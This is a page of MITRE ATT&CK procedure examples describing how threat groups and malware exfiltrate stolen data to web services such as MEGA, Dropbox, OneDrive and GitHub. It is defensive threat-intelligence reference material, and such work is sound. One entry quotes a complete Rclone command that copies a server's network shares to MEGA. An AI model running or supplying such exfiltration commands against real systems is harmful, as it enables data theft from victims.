ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

17136 examples

TechniqueUsed byProcedure example
T1567
Exfiltration Over Web Service
MalwareDropBook

DropBook has used legitimate web services to exfiltrate data.

T1567
Exfiltration Over Web Service
MalwareExbyte

Exbyte exfiltrates collected data to online file hosting sites such as `Mega.co.nz`.

T1567
Exfiltration Over Web Service
MalwareOilCheck

OilCheck can upload documents from compromised hosts to a shared Microsoft Office 365 Outlook email account for exfiltration.

T1567
Exfiltration Over Web Service
MalwareSampleCheck5000

SampleCheck5000 can use the Microsoft Office Exchange Web Services API to access an actor-controlled account and retrieve files for exfiltration.

T1567
Exfiltration Over Web Service
Toolngrok

ngrok has been used by threat actors to configure servers for data exfiltration.

T1567
Exfiltration Over Web Service
GroupShinyHunters

ShinyHunters has used compromised Salesforce CRM (Customer Relationship Management) dashboards to exfiltrate bulk data. Additionally, ShinyHunters has used LimeWire, a file-sharing service, to showcase samples of stolen data.

T1567.001
Exfiltration to Code Repository
MalwareShai-Hulud

Shai-Hulud has created a repository named `Shai-Hulud` under the compromised account that commits a JSON dump that contains system information, environment variables and collected secrets. Shai-Hulud has also posted stolen credentials to public GitHub repositories.

T1567.001
Exfiltration to Code Repository
ToolEmpire

Empire can use GitHub for data exfiltration.

T1567.001
Exfiltration to Code Repository
MalwareTeamPCP Cloud Stealer

TeamPCP Cloud Stealer can create a repository in the victim's GitHub account using the victim's own GITHUB_TOKEN to upload stolen credentials.

T1567.001
Exfiltration to Code Repository
MalwareMini Shai-Hulud

Mini Shai-Hulud has exfiltrated data through the use of the victim’s own GitHub repository by creating a new public repository using a unique naming convention from a curated list of key words or themes.

T1567.002
Exfiltration to Cloud Storage
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.

T1567.002
Exfiltration to Cloud Storage
CampaignC0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.

T1567.002
Exfiltration to Cloud Storage
CampaignAPT41 DUST

APT41 DUST exfiltrated collected information to OneDrive.

T1567.002
Exfiltration to Cloud Storage
GroupIndrik Spider

Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.

T1567.002
Exfiltration to Cloud Storage
GroupKimsuky

Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts. Kimsuky has also leveraged Dropbox for uploading victim system information.

T1567.002
Exfiltration to Cloud Storage
GroupHAFNIUM

HAFNIUM has exfiltrated data to file sharing sites, including MEGA.

T1567.002
Exfiltration to Cloud Storage
GroupMuddyWater

MuddyWater has attempted to exfiltrate data to Wasabi, a cloud storage service, using Rclone.

T1567.002
Exfiltration to Cloud Storage
GroupFIN7

FIN7 has exfiltrated stolen data to the MEGA file sharing site.

T1567.002
Exfiltration to Cloud Storage
GroupMustang Panda

Mustang Panda has also exfiltrated archived files to cloud services such as Dropbox using `curl`.

T1567.002
Exfiltration to Cloud Storage
GroupZIRCONIUM

ZIRCONIUM has exfiltrated stolen data to Dropbox.

T1567.002
Exfiltration to Cloud Storage
GroupScattered Spider

Scattered Spider has exfiltrated victim data to the MEGA file sharing site, SnowFlake, and AWS S3 buckets.

T1567.002
Exfiltration to Cloud Storage
GroupContagious Interview

Contagious Interview has exfiltrated stolen passwords to Dropbox.

T1567.002
Exfiltration to Cloud Storage
GroupAkira

Akira will exfiltrate victim data using applications such as Rclone.

T1567.002
Exfiltration to Cloud Storage
GroupPOLONIUM

POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.

T1567.002
Exfiltration to Cloud Storage
GroupConfucius

Confucius has exfiltrated victim data to cloud storage service accounts.

T1567.002
Exfiltration to Cloud Storage
GroupLeviathan

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.

T1567.002
Exfiltration to Cloud Storage
GroupTurla

Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.

T1567.002
Exfiltration to Cloud Storage
GroupStorm-0501

Storm-0501 has exfiltrated stolen data to the MEGA file sharing site. Storm-0501 has also utilized Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync. Storm-0501 has exfiltrated data to their own infrastructure utilizing AzCopy Command-Line tool (CLI).

T1567.002
Exfiltration to Cloud Storage
GroupCinnamon Tempest

Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.

T1567.002
Exfiltration to Cloud Storage
GroupChimera

Chimera has exfiltrated stolen data to OneDrive accounts.

T1567.002
Exfiltration to Cloud Storage
GroupMedusa Group

Medusa Group has utilized Rclone to exfiltrate data from victim environments to cloud storage.

T1567.002
Exfiltration to Cloud Storage
GroupEmber Bear

Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`.

T1567.002
Exfiltration to Cloud Storage
GroupToddyCat

ToddyCat has used a DropBox uploader to exfiltrate stolen files.

T1567.002
Exfiltration to Cloud Storage
GroupLuminousMoth

LuminousMoth has exfiltrated data to Google Drive.

T1567.002
Exfiltration to Cloud Storage
GroupEarth Lusca

Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.

T1567.002
Exfiltration to Cloud Storage
GroupWizard Spider

Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.

T1567.002
Exfiltration to Cloud Storage
GroupHEXANE

HEXANE has used cloud services, including OneDrive, for data exfiltration.

T1567.002
Exfiltration to Cloud Storage
GroupThreat Group-3390

Threat Group-3390 has exfiltrated stolen data to Dropbox.

T1567.002
Exfiltration to Cloud Storage
MalwareTsundere Botnet

Tsundere Botnet’s variant DinDoor has used Rclone to access a Wasabi server.

T1567.002
Exfiltration to Cloud Storage
MalwareRainyDay

RainyDay can use a file exfiltration tool to upload specific files to Dropbox.

T1567.002
Exfiltration to Cloud Storage
MalwareHAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.

T1567.002
Exfiltration to Cloud Storage
MalwareODAgent

ODAgent can use an attacker-controlled OneDrive account for exfiltration.

T1567.002
Exfiltration to Cloud Storage
MalwareROKRAT

ROKRAT can send collected data to cloud storage services such as PCloud.

T1567.002
Exfiltration to Cloud Storage
MalwareClambling

Clambling can send files from a victim's machine to Dropbox.

T1567.002
Exfiltration to Cloud Storage
MalwareCreepyDrive

CreepyDrive can use cloud services including OneDrive for data exfiltration.

T1567.002
Exfiltration to Cloud Storage
MalwareBoxCaon

BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.

T1567.002
Exfiltration to Cloud Storage
MalwareCrutch

Crutch has exfiltrated stolen data to Dropbox.

T1567.002
Exfiltration to Cloud Storage
MalwareOilBooster

OilBooster can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API.

T1567.002
Exfiltration to Cloud Storage
MalwareBoomBox

BoomBox can upload data to dedicated per-victim folders in Dropbox.

T1567.002
Exfiltration to Cloud Storage
MalwareRIFLESPINE

RIFLESPINE can upload results from executed C2 commands to cloud storage.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.